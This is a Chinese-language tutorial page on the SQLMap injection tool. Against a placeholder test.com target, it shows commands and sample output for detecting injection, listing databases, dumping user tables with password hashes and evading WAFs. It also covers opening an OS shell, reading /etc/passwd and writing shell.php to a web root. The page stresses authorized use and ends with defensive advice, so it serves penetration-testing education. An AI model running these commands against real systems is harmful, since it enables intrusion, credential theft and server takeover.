SQLMap：数据库安全的精准扫描尖兵

 更新：2025-03-08 浏览：119 收藏：0 点赞：0

在数据库安全防护的复杂战线中，SQLMap 犹如一位行动敏捷、精准无误的扫描尖兵。它作为一款强大的自动化 SQL 注入检测工具，能够迅速探测数据库潜在风险。本教程将细致拆解 SQLMap 的常用命令，结合示例输出，生动阐释实战场景应用。但请务必牢记，所有操作均需在合法授权环境下展开。旨在助力您熟练运用 SQLMap，在合规前提下，精准排查数据库漏洞，筑牢数据库安全防线，为数据资产保驾护航。

1. 简介

SQLMap 是一款自动化 SQL 注入工具，支持检测和利用 SQL 注入漏洞，功能包括：

数据库指纹识别
数据提取（库名、表名、字段、内容）
文件系统读写（需高权限）
操作系统命令执行（需高权限）

2. 安装与基础命令

安装

# Kali Linux 预装，其他系统安装方式：
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python3 sqlmap.py -h

基础语法

python3 sqlmap.py -u <URL> [参数]

3. 基本漏洞检测

检测注入点

python3 sqlmap.py -u "http://test.com/vuln.php?id=1"

# 示例输出
[INFO] testing connection to the target URL
[INFO] testing if the target URL content is stable
[INFO] testing if GET parameter &#039;id&#039; is dynamic
[INFO] heuristic (basic) test shows that GET parameter &#039;id&#039; might be injectable
[INFO] testing for SQL injection on GET parameter &#039;id&#039;
[INFO] &#039;ORDER BY&#039; technique appears to be usable. This should reduce the time
[INFO] GET parameter &#039;id&#039; is &#039;MySQL >= 5.0.12 AND time-based blind injectable&#039;

获取数据库名称

python3 sqlmap.py -u "http://test.com/vuln.php?id=1" --dbs

# 示例输出
[INFO] the back-end DBMS is MySQL
[INFO] fetching database names
available databases [2]:
[*] information_schema
[*] testdb

4. 数据提取

获取表名

python3 sqlmap.py -u "http://test.com/vuln.php?id=1" -D testdb --tables

# 示例输出
[INFO] fetching tables for database: &#039;testdb&#039;
Database: testdb
[2 tables]
+---------+
| users   |
| products|
+---------+

获取字段名

python3 sqlmap.py -u "http://test.com/vuln.php?id=1" -D testdb -T users --columns

# 示例输出
Database: testdb
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| username | varchar(64) |
| password | varchar(64) |
+----------+-------------+

导出数据

python3 sqlmap.py -u "http://test.com/vuln.php?id=1" -D testdb -T users -C username,password --dump

# 示例输出
[INFO] fetching entries for table &#039;users&#039; in database &#039;testdb&#039;
Database: testdb
Table: users
[2 entries]
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1  | admin    | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2  | guest    | 098f6bcd4621d373cade4e832627b4f6 |
+----+----------+----------+

5. 高级技巧

绕过 WAF/过滤

# 使用随机 User-Agent 和延迟
python3 sqlmap.py -u "http://test.com/vuln.php?id=1" --random-agent --delay=2

# 使用 tamper 脚本混淆请求
python3 sqlmap.py -u "http://test.com/vuln.php?id=1" --tamper=space2comment

执行操作系统命令

（需数据库有高权限，如 MySQL FILE 权限）

python3 sqlmap.py -u "http://test.com/vuln.php?id=1" --os-shell

# 示例输出
[INFO] testing if current user is DBA
[INFO] fetching current user
current user is &#039;root@localhost&#039;
[INFO] going to use a web backdoor
[INFO] OS shell access granted. Type &#039;?&#039; for help.
os-shell> whoami
root

文件读写

# 读取服务器文件
python3 sqlmap.py -u "http://test.com/vuln.php?id=1" --file-read="/etc/passwd"

# 写入文件（需可写权限）
python3 sqlmap.py -u "http://test.com/vuln.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

6. 实用参数速查

参数	说明
`--level=LEVEL`	测试级别（1-5，默认1）
`--risk=RISK`	风险等级（1-3，默认1）
`--proxy="http://IP:PORT"`	通过代理发送请求
`--batch`	自动选择默认选项
`--flush-session`	清空上次扫描缓存
`--technique=TECH`	指定注入技术（B, E, U, S, T）
`--eval="code"`	执行动态代码（如处理时间戳）

7. 完整示例

目标

攻击 URL：http://test.com/search.php?q=apple&category=2

分步操作

检测注入点

python3 sqlmap.py -u "http://test.com/search.php?q=apple&category=2" -p "category"

获取数据库名称

python3 sqlmap.py -u "http://test.com/search.php?q=apple&category=2" --dbs

导出用户表数据

python3 sqlmap.py -u "http://test.com/search.php?q=apple&category=2" -D testdb -T users --dump

获取操作系统 Shell

python3 sqlmap.py -u "http://test.com/search.php?q=apple&category=2" --os-shell

8. 防御建议

输入过滤：使用参数化查询（如 PDO、Prepared Statements）
错误处理：禁止显示数据库错误详情
权限控制：数据库账户使用最小权限原则
WAF 部署：使用 ModSecurity、Cloudflare 等 Web 应用防火墙

总结

SQLMap 是测试中检测 SQL 注入的利器，但务必遵守法律和道德准则。建议在授权环境下使用 DVWA、SQLi Labs 等靶场练习。

联系管理员

SQLMap：数据库安全的精准扫描尖兵

1. 简介

2. 安装与基础命令

安装

基础语法

3. 基本漏洞检测

检测注入点

获取数据库名称

4. 数据提取

获取表名

获取字段名

导出数据

5. 高级技巧

绕过 WAF/过滤

执行操作系统命令

文件读写

6. 实用参数速查

7. 完整示例

目标

分步操作

8. 防御建议

总结

评论

联系管理员

SQLMap：数据库安全的精准扫描尖兵

1. 简介

2. 安装与基础命令

安装

基础语法

3. 基本漏洞检测

检测注入点

获取数据库名称

4. 数据提取

获取表名

获取字段名

导出数据

5. 高级技巧

绕过 WAF/过滤

执行操作系统命令

文件读写

6. 实用参数速查

7. 完整示例

目标

分步操作

8. 防御建议

总结

相关文章

评论

￥{{ payArticleData.total_amount }}

￥{{ payArticleData.total_amount }}

登录 / Login

社交账号登录